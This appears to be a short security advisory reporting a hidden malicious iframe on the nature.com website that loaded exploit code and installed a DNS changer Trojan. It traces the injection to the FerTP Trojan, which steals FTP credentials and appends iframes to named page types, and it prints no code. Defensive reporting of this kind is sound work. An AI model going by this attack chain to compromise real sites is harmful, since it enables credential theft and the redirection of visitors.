Malicious iFrame Detected on
Beginning May 10th, a malicious iframe was detected on the nature.com website. The iframe loads malicious exploit code from a path on the money2008.org domain. On susceptible systems, the exploit results in the installation of a DNS changer Trojan. A DNS changer Trojan can be used to forcibly – and surreptitiously – redirect victims to sites other they expected. For example, a user attempting to access their online banking site may be directed to a look-alike site, capturing their banking credentials when they attempt to login to what they believe to be the legitimate site. The injected iframe would not be readily visible to visitors of the nature.com website, which continued to display normally as seen in the screenshot below.
However, the script for the hidden iframe is apparent when examining the site’s source code, as seen in the screenshot below. Note that the malicious script has since been removed from the nature.com website.
The particular iframe is consistent with an iframe appended to sites via the FerTP Trojan. FerTP is a backdoor / password stealing Trojan that harvests FTP login credentials and sends those credentials to a remote attacker. The Trojan also logs into the sites using those same FTP credentials, searching for specific types of web pages and appending the malicious iframe to each one found. The targeted pages are index.htm*, index.php, main.htm*, main.php, default.htm, and default.php.
This report was completed by: Mary Landesman